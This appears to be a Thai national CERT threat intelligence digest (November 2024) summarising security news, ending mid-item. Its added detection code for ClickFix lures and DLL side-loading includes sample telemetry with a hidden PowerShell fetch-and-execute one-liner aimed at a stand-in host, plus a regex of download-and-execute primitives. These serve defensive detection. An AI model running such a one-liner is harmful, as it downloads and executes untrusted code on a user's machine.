News updates are available on the webboard or the NCSA Thailand Facebook page.
- CISA adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog
- Helldown ransomware attacks Linux systems and VMware servers, causing significant damage
- CISA releases one Industrial Control Systems advisory
The Cybersecurity and Infrastructure Security Agency (CISA) published one Industrial Control Systems (ICS) advisory on 19 November 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. The advisory is:
- ICSA-24-324-01 Mitsubishi Electric MELSEC iQ-F Series
CISA encourages users and administrators to review the newly released ICS advisory for technical details and mitigations. More details at https://www.cisa.gov/news-events/alerts/2024/11/19/cisa-releases-one-industrial-control-systems-advisory
- Critical RCE vulnerability in VMware vCenter Server now exploited in attacks
- Akira ransomware sets a record with more than 30 victims in a single day
Cyber Threat Intelligence 19 November 2024
Industrial Sector
- Many US Water Systems Exposed To ‘high-Risk’ Vulnerabilities, Watchdog Finds
"Nearly 100 drinking water systems across the U.S. have “high-risk” vulnerabilities in the technology they use to serve millions of residents, according to a new report from a federal watchdog. The Environmental Protection Agency’s Office of Inspector General conducted a review of the agency’s cybersecurity initiatives, using an algorithm to rank issues at specific water utilities across the U.S. revolving around email security, IT hygiene, vulnerabilities, adversarial threats, and malicious activity."
https://therecord.media/us-water-systems-exposed-vulnerabilities
https://www.epaoig.gov/reports/other/management-implication-report-cybersecurity-concerns-related-drinking-water-systems
https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/
New Tooling
- ScubaGear: Open-Source Tool To Assess Microsoft 365 Configurations For Security Gaps
"ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment."
https://www.helpnetsecurity.com/2024/11/18/scubagear-open-source-tool-assess-microsoft-365-security/
https://github.com/cisagov/ScubaGear
Vulnerabilities
- Critical RCE Bug In VMware vCenter Server Now Exploited In Attacks
"Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. TZL security researchers reported the RCE vulnerability (CVE-2024-38812) during China's 2024 Matrix Cup hacking contest. It is caused by a heap overflow weakness in the vCenter's DCE/RPC protocol implementation and affects products containing vCenter, including VMware vSphere and VMware Cloud Foundation."
https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/
- Palo Alto Networks Patches Two Firewall Zero-Days Used In Attacks
"Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-patches-two-firewall-zero-days-used-in-attacks/
https://www.darkreading.com/cyberattacks-data-breaches/palo-alto-networks-patches-critical-zero-day-bug-firewalls
https://www.securityweek.com/palo-alto-networks-releases-iocs-for-new-firewall-zero-day/
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
- CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-1212 Progress Kemp LoadMaster OS Command Injection Vulnerability
CVE-2024-0012 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
CVE-2024-9474 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
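A KEV addition only becomes work once it is matched against what an organisation actually runs. The following is an added example, not code from CISA or from this digest: it parses a feed excerpt constructed in the shape of CISA's known_exploited_vulnerabilities.json (containing the three entries listed above), matches vendor and product against a constructed asset inventory, and reports the remediation deadline per host. The due dates, host names and version strings are assumptions. KEV entries carry no version data, so a hit means "check the vendor advisory for this product line", not a confirmed exposure.

```python
"""Cross-reference a CISA KEV feed against an asset inventory.

Added example; not code from CISA or this digest. The feed excerpt is
constructed in the shape of known_exploited_vulnerabilities.json and holds the
three entries named in the 18 November alert; due dates and inventory hosts
are constructed for illustration.
"""
import json
from datetime import date

KEV_FEED_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2024-1212", "vendorProject": "Progress", "product": "Kemp LoadMaster",
         "vulnerabilityName": "Progress Kemp LoadMaster OS Command Injection Vulnerability",
         "dateAdded": "2024-11-18", "dueDate": "2024-12-09",  # dueDate constructed
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-0012", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
         "vulnerabilityName": "Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability",
         "dateAdded": "2024-11-18", "dueDate": "2024-12-09",  # dueDate constructed
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-9474", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
         "vulnerabilityName": "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability",
         "dateAdded": "2024-11-18", "dueDate": "2024-12-09",  # dueDate constructed
         "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory, with vendor/product strings in the mixed case a CMDB export tends to produce.
INVENTORY = [
    {"host": "fw-edge-01", "vendor": "Palo Alto Networks", "product": "PAN-OS"},
    {"host": "lb-dmz-02", "vendor": "progress", "product": "kemp loadmaster"},
    {"host": "app-01", "vendor": "Apache", "product": "Tomcat"},
]


def load_kev(feed_text):
    """Parse the KEV JSON document and return its vulnerability entries."""
    return json.loads(feed_text)["vulnerabilities"]


def _norm(s):
    # case- and whitespace-insensitive key so CMDB spelling variants still match
    return " ".join(s.lower().split())


def match_inventory(kev_entries, inventory):
    """Return one record per (asset, KEV entry) pair whose vendor and product agree.

    KEV has no version field: a match flags the product line for advisory review.
    """
    index = {}
    for e in kev_entries:
        index.setdefault((_norm(e["vendorProject"]), _norm(e["product"])), []).append(e)
    matches = []
    for asset in inventory:
        for e in index.get((_norm(asset["vendor"]), _norm(asset["product"])), []):
            matches.append({"host": asset["host"], "cveID": e["cveID"],
                            "dueDate": e["dueDate"],
                            "ransomware": e["knownRansomwareCampaignUse"]})
    return sorted(matches, key=lambda m: (m["dueDate"], m["cveID"], m["host"]))


def days_until_due(match, today_iso):
    """Days remaining until the KEV due date; negative once overdue."""
    return (date.fromisoformat(match["dueDate"]) - date.fromisoformat(today_iso)).days


def report(matches, today_iso):
    """One line per match, flagging entries past their BOD 22-01 due date."""
    lines = []
    for m in matches:
        delta = days_until_due(m, today_iso)
        status = "OVERDUE" if delta < 0 else f"due in {delta}d"
        lines.append(f"{m['host']}: {m['cveID']} ({status}; ransomware use: {m['ransomware']})")
    return lines


if __name__ == "__main__":
    for line in report(match_inventory(load_kev(KEV_FEED_JSON), INVENTORY), "2024-11-19"):
        print(line)
```

In production the feed would be fetched from CISA and the inventory pulled from the CMDB; the matching logic stays the same. Keep the vendor/product key loose on purpose: a false positive costs one advisory lookup, a false negative costs a missed deadline on an actively exploited bug.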
Malware
- Distribution Of LummaC2 Infostealer Based On Legitimate Programs
"LummaC2 is an Infostealer actively being distributed while being disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed."
https://asec.ahnlab.com/en/84556/
- Inside Water Barghest’s Rapid Exploit-To-Market Strategy For IoT Devices
"There is a big incentive for both espionage motivated actors and financially motivated actors to set up proxy botnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape contents of websites, access stolen or compromised online assets, and launch cyber-attacks. Examples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively."
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
https://www.bankinfosecurity.com/suspected-russian-hackers-infect-20000-iot-devices-a-26840
- Inside Bitdefender Labs’ Investigation Of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
"Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension under the guise of a security update."
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
https://www.bleepingcomputer.com/news/security/fake-bitwarden-ads-on-facebook-push-info-stealing-chrome-extension/
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
- Microsoft 365 Admin Portal Abused To Send Sextortion Emails
"The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the messages appear trustworthy and bypassing email security platforms. Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends."
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/
- Akira Ransomware Racks Up 30+ Victims In a Single Day
"Akira ransomware group has updated its data-leak website on Nov. 13-14, listing more than 30 of its latest victims — the highest single-day total since the gang first began its malicious operations in March of last year. The group spares no one, targeting a variety of industries globally, and operates using a ransomware-as-a-service (RaaS) model, stealing sensitive data before encrypting it."
https://www.darkreading.com/cyberattacks-data-breaches/akira-ransomware-30-victims-single-day
https://therecord.media/akira-ransomware-group-publishes-unprecedented-leak-data
https://drive.google.com/file/d/11ZjlJg2LDHAOwxFjUsqaZrK7Yg15IrAw/view
- Government Agency Spoofing: DocuSign Attacks Exploit Government-Vendor Trust
"The latest wave of DocuSign attacks has taken a concerning turn, specifically targeting businesses that regularly interact with state, municipal, and licensing authorities. Since November 8 through November 14, we have observed a 98% increase in the use of DocuSign phishing URLs compared to all of September and October. In the last few days, our threat researchers are seeing hundreds of instances each day, many of which involve government impersonations. What’s more, the specific tactics employed in these attacks are evolving on a daily basis. Contact us for more information about DocuSign attack metrics."
https://slashnext.com/blog/government-docusign-impersonation-attacks/
https://hackread.com/us-govt-agencies-impersonate-docusign-phishing-scams/
- Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
"Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer."
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/
- QuickBooks Popup Scam Still Being Delivered Via Google Ads
"Accounting software QuickBooks, by Intuit, is a popular target for India-based scammers, only rivaled for top spot by the classic Microsoft tech support scams. We’ve seen two main lures, both via Google ads: the first one is simply a website promoting online support for QuickBooks and shows a phone number, while the latter requires victims to download and install a program that will generate a popup, also showing a phone number. In both instances, that number is fraudulent."
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
- Threat Brief: Operation Lunar Peek, Activity Related To CVE-2024-0012
"Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly."
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
- Exploit Attempts For Unpatched Citrix Vulnerability
"Last week, Watchtowr Labs released details describing a new and so far unpatched vulnerability in Citrix's remote access solution [1]. Specifically, the vulnerability affects the "Virtual Apps and Desktops." This solution allows "secure" remote access to desktop applications. It is commonly used for remote work, and I have seen it used in call center setups to isolate individual workstations from the actual desktop."
https://isc.sans.edu/diary/31446
- XLoader Executed Through JAR Signing Tool (jarsigner.exe)
"Recently, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. The DLL side-loading attack technique saves a normal application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. The legitimate application used in the attack, jarsigner, is a file created during the installation of the IDE package distributed by the Eclipse Foundation. It is a tool for signing JAR (Java Archive) files."
https://asec.ahnlab.com/en/84574/
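Two of the items above describe endpoint techniques that leave distinctive telemetry: ClickFix (the victim pastes a fetch-and-execute PowerShell one-liner into the Win+R dialog, which Explorer records in the RunMRU registry key) and DLL side-loading (a malicious DLL placed beside a legitimate signed binary such as jarsigner.exe). The following is an added example, not code from Proofpoint, ASEC or this digest: detection rules run over constructed events in the shape of Sysmon records (EventID 1 process creation, 7 image load, 13 registry value set). The hostnames, paths, the jli.dll file name and the example.invalid URL are assumptions, not indicators from either report.

```python
"""Detection logic for ClickFix paste-and-run lures and DLL side-loading.

Added example; not code from Proofpoint, ASEC or this digest. SAMPLE_EVENTS is
constructed telemetry in Sysmon field naming; paths, names and URLs are assumed.
"""
import ntpath
import re

# Command-line primitives typical of paste-and-run lures: fetch, decode, execute.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring"
    r"|-enc(odedcommand)?\b|frombase64string|mshta\s+https?://)",
    re.IGNORECASE,
)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Locations a standard user can write to; a signed tool copied here is a red flag.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public|programdata)\\", re.I)
# Signed binaries known to resolve a DLL by name from their own directory (extend as needed).
SIDELOAD_HOSTS = {"jarsigner.exe"}


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def rule_clickfix_process(ev):
    """Interpreter launched by explorer.exe (Run dialog / shell) with fetch+exec arguments."""
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) not in INTERPRETERS:
        return None
    if _base(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    if not DOWNLOAD_EXEC.search(ev.get("CommandLine", "")):
        return None
    return "clickfix_run_dialog_interpreter"


def rule_clickfix_runmru(ev):
    """Win+R history written under Explorer\\RunMRU containing a fetch+exec one-liner."""
    if ev.get("EventID") != 13:
        return None
    if "\\explorer\\runmru\\" not in ev.get("TargetObject", "").lower():
        return None
    if not DOWNLOAD_EXEC.search(ev.get("Details", "")):
        return None
    return "clickfix_runmru_artifact"


def rule_dll_sideload(ev):
    """Known side-load host loading a DLL from its own directory, where the DLL is
    unsigned or the host binary sits in a user-writable location."""
    if ev.get("EventID") != 7 or _base(ev.get("Image", "")) not in SIDELOAD_HOSTS:
        return None
    if _dir(ev.get("ImageLoaded", "")) != _dir(ev["Image"]):
        return None
    unsigned = str(ev.get("Signed", "")).lower() != "true"
    if unsigned or USER_WRITABLE.search(ev["Image"]):
        return "dll_sideload_adjacent_dll"
    return None


RULES = (rule_clickfix_process, rule_clickfix_runmru, rule_dll_sideload)


def detect(events):
    """Run every rule over every event; return alerts in event order."""
    alerts = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            name = rule(ev)
            if name:
                alerts.append({"index": idx, "rule": name, "image": ev.get("Image")})
    return alerts


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr -useb http://example.invalid/fix.ps1)"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": "powershell -c Get-Service"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": 'powershell -w hidden -c "iex (iwr -useb http://example.invalid/fix.ps1)"\\1'},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\jarsigner.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\jli.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Eclipse\jdk\bin\jarsigner.exe",
     "ImageLoaded": r"C:\Program Files\Eclipse\jdk\bin\jli.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The second process event (PowerShell spawned by a vendor agent with a benign command) and the second image-load event (jarsigner.exe in its normal install directory loading a signed DLL) are there to show the rules stay quiet on ordinary activity. The RunMRU rule is useful for retrospective hunting because the registry artifact survives after the PowerShell process is gone.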
Breaches/Hacks/Leaks
- Library Of Congress Says An Adversary Hacked Some Emails
"The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary, a hack of emails between some congressional offices and library staff, according to an email obtained by The Associated Press. The library said that an adversary accessed email communications during the period from January to September. The matter has been referred to law enforcement, the library said. Authorities gave no immediate information on the attacker, including whether their identity was known."
https://www.securityweek.com/library-of-congress-says-an-adversary-hacked-some-emails/
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html
- US Space Tech Giant Maxar Discloses Employee Data Breach
"Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. The threat actor compromised the company network about a week before the discovery of the intrusion. Immediately after discovering the unauthorized access, the company took action to prevent the hackers from reaching further into the system."
https://www.bleepingcomputer.com/news/security/us-space-tech-giant-maxar-discloses-employee-data-breach/
- Ransomware Attack On Oklahoma Medical Center Impacts 133,000
"Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems."
https://www.securityweek.com/ransomware-attack-on-oklahoma-medical-center-impacts-133000/
- Ford 'actively Investigating' After Employee Data Allegedly Parked On Leak Site
"Ford Motor Company says it is looking into allegations of a data breach after attackers claimed to have stolen an internal database containing 44,000 customer records and dumped the info on a cyber crime souk for anyone to "enjoy." "Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told The Register. "Our investigation is active and ongoing." The erstwhile manufacturer of the Edsel declined to answer our questions about the possible compromise."
https://www.theregister.com/2024/11/18/ford_actively_investigating_breach/
General News
- Identity Fraud And The Cost Of Living Crisis: New Challenges For 2024
"Fraud is a rampant threat to individuals and organizations worldwide and across all sectors. In order to protect against the dangers of fraud in its many forms, it is vital to stay in the loop on the latest fraud trends and the threat landscape. The Fraudscape 2024 report from Cifas, the UK’s Fraud Prevention Community, is an effort to share this information to help prevent fraud. The report is compiled using data from Cifas’ National Fraud Database (NFD), Insider Threat Database (ITD), and intelligence from members, partners, and law enforcement agencies."
https://www.tripwire.com/state-of-security/identity-fraud-and-cost-living-crisis-new-challenges
- Cyberbiosecurity: Where Digital Threats Meet Biological Systems
"Cyberbiosecurity has emerged as an essential area of interest as the boundaries between the digital and biological sectors continue to blur. With rapid advancements in areas such as artificial intelligence, automation, and synthetic biology, the need for strong cyberbiosecurity protections has grown to safeguard the bioeconomy. As biotechnology evolves, it creates a complex landscape where breaches can have consequences far beyond typical cyber risks. Cyberbiosecurity is about securing the foundation of our biological future."
https://www.tripwire.com/state-of-security/cyberbiosecurity-where-digital-threats-meet-biological-systems
- Navigating The Compliance Labyrinth: A CSO’s Guide To Scaling Security
"Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment."
https://www.helpnetsecurity.com/2024/11/18/cso-compliance-challenges/
- Transforming Code Scanning And Threat Detection With GenAI
"In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation."
https://www.helpnetsecurity.com/2024/11/18/stuart-mcclure-qwiet-ai-code-scanning/
- UK Shoppers Lost £11.5m Last Christmas, NCSC Warns
"One of the UK’s leading cybersecurity agencies is urging the nation’s shoppers to stay safe online, after revealing that they lost over £11.5m ($14.5m) to fraudsters during last year’s festive period. Over recent years, the countdown to the busy Christmas shopping season has begun at around Black Friday, which falls this year on November 29, and lasts until early January. Yet new figures revealed today by the NCSC and Action Fraud note that scammers took an average of £695 from each of their online victims between November 2023 and January 2024."
https://www.infosecurity-magazine.com/news/ncsc-warns-uk-shoppers-lost-115m/
- US Charges Phobos Ransomware Admin After South Korea Extradition
"Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. Phobos is a long-running ransomware-as-a-service (RaaS) operation (derived from the Crysis ransomware family) widely distributed through many affiliates. Between May 2024 and November 2024, it accounted for roughly 11% of all submissions to the ID Ransomware service."
https://www.bleepingcomputer.com/news/security/us-charges-phobos-ransomware-admin-after-south-korea-extradition/
https://therecord.media/russian-national-in-custody-extradited
https://www.bankinfosecurity.com/accused-phobos-ransomware-hacker-in-us-custody-a-26839
https://cyberscoop.com/alleged-russian-phobos-ransomware-administrator-extradited-to-u-s-in-custody/
- Why The Demand For Cybersecurity Innovation Is Surging
"Companies have never faced a wider and more dynamic array of cyber threats than they do right now. From rapidly rising costs associated with data breaches and other cyberattacks to the exploitation of artificial intelligence (AI) to make attacks more effective than ever, the cyber-threat landscape is constantly evolving. This has led to a drastic increase in cybersecurity spending, as well as a wave of innovation in the sector."
https://www.darkreading.com/cyberattacks-data-breaches/why-demand-cybersecurity-innovation-is-surging
- Why Custom IOCs Are Necessary For Advanced Threat Hunting And Detection
"The speed, precision, timeliness, and relevance of Cyber Threat Intelligence (CTI) is crucial for protecting digital infrastructures and driving proactive responses against emerging cybersecurity threats. To me, CTI is an ART: it has to be Actionable, Reliable, and Timely. One of the most critical components of CTI is indicators of compromise (IOCs). IOCs are crumbs of data or fingerprints (e.g., unusual IP addresses and web domains, unexpected network traffic, suspicious changes in file systems) left by adversaries in a previous cyberattack. This serves as invaluable clues to security professionals for detecting and tracing potential breaches or malicious activities in their own environments. Despite the on-paper benefits of IOCs, most cybersecurity professionals struggle to utilize them effectively."
https://www.securityweek.com/why-custom-iocs-are-necessary-for-advanced-threat-hunting-and-detection/
- DHS Releases Secure AI Framework For Critical Infrastructure
"The US Department of Homeland Security (DHS) has released recommendations that outline how to securely develop and deploy artificial intelligence (AI) in critical infrastructure. The recommendations apply to all players in the AI supply chain, starting with cloud and compute infrastructure providers, to AI developers, and all the way to critical infrastructure owners and operators. Recommendations for civil society and public-sector organizations are also provided. The voluntary recommendations in "Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure" look at each of the roles across five key areas: securing environments, driving responsible model and system design, implementing data governance, ensuring safe and secure deployment, and monitoring performance and impact. There are also technical and process recommendations to enhance the safety, security, and trustworthiness of AI systems."
https://www.darkreading.com/cloud-security/dhs-releases-secure-ai-framework-critical-infrastructure
Reference
Electronic Transactions Development Agency (ETDA) - Many US Water Systems Exposed To ‘high-Risk’ Vulnerabilities, Watchdog Finds
- Botnet exploits a zero-day vulnerability in end-of-life GeoVision devices
- Critical vulnerability in a WordPress plugin puts more than 4 million websites at risk of remote takeover
Cyber Threat Intelligence 18 November 2024
Vulnerabilities
- Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
"A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piort Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT."
https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html
https://securityaffairs.com/171067/malware/ddos-botnet-exploits-geovision-zero-day.html
- Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
"It’s been a tricky time for Fortinet (and their customers) lately - arguably, even more so than usual. Adding to the steady flow of vulnerabilities in appliances recently was a nasty CVSS 9.8 vulnerability in FortiManager, their tool for central management of FortiGate appliances. As always, the opinions expressed in this blogpost are of the watchTowr team alone. If you don't enjoy our opinions, please scream into a paper bag."
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
https://www.infosecurity-magazine.com/news/watchtowr-new-vulnerability/
- Palo Alto Networks Warns Of Critical RCE Zero-Day Exploited In Attacks
"Palo Alto Networks is warning that a critical zero-day vulnerability on Next-Generation Firewalls (NGFW) management interfaces, currently tracked as 'PAN-SA-2024-0015,' is actively being exploited in attacks. The flaw was originally disclosed on November 8, 2024, with Palo Alto Networks warning customers to restrict access to their next-generation firewalls because of a "potential" remote code execution (RCE) vulnerability impacting them. No signs of exploitation were detected at that time, but now, one week later, the situation has changed."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-critical-rce-zero-day-exploited-in-attacks/
https://therecord.media/palo-alto-networks-firewall-vulnerability-exploited
https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
https://www.bankinfosecurity.com/palo-alto-reports-firewalls-exploited-using-unknown-flaw-a-26822
https://cyberscoop.com/palo-alto-expedition-firewall-exploit-cisa-kev/
https://www.infosecurity-magazine.com/news/palo-alto-confirms-new-0day/
https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
https://www.theregister.com/2024/11/15/palo_alto_networks_firewall_zeroday/
https://securityaffairs.com/171057/hacking/palo-alto-networks-zero-day-exploitation.html
Malware
- Report On DDoSia Malware Launching DDoS Attacks Against Korean Institutions
"The Russian hacktivist group NoName057 (16) has been active since March 2022, and their goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName05, along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The attacks were believed to have been triggered by the remarks made by Minister of Foreign Affairs Cho Tae-yul and President Yoon Suk-yeol regarding the supply of weapons to Ukraine. As a result of these attacks, various South Korean organizations suffered damages."
https://asec.ahnlab.com/en/84531/
- BrazenBamboo Weaponizes FortiClient Vulnerability To Steal VPN Credentials Via DEEPDATA
"In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory."
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/
https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
- Babble Babble Babble Babble Babble Babble BabbleLoader
"The pace of innovation and development in the malware detection market is relentless, the same goes for the development of malware itself. Constantly charging and adapting to create ever more evasive and capable payloads. One such sector of this market is the loader (also called crypter or packer) market. In today’s threat landscape, loaders have become a critical tool in cybercrime operations, serving as the backbone for delivering a range of malicious payloads. Loaders are often the first stage in an attack chain, designed to stealthily execute or inject malware, such as info-stealers or ransomware, into a target system."
https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/
- Thanos Operator Targets Police Department In United Arab Emirates
"The SonicWall Capture Labs threat research team has come across a variant of Thanos ransomware targeted at a police department in the United Arab Emirates (UAE). Thanos ransomware is a customizable and highly adaptable ransomware-as-a-service (RaaS) tool that allows cybercriminals to create and deploy ransomware tailored to their needs. It is known for its data-stealing capabilities, the ability to spread through networks and the use of advanced evasion techniques to avoid detection."
https://blog.sonicwall.com/en-us/2024/11/thanos-operator-targets-police-in-united-arab-emirates/
- Fake AI Video Generators Infect Windows, MacOS With Infostealers
"Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. Lumma Stealer is a Windows malware and AMOS is for macOS, but both steal cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces."
https://www.bleepingcomputer.com/news/security/fake-ai-video-generators-infect-windows-macos-with-infostealers/
- GitHub Projects Targeted With Malicious Commits To Frame Researcher
"GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions."
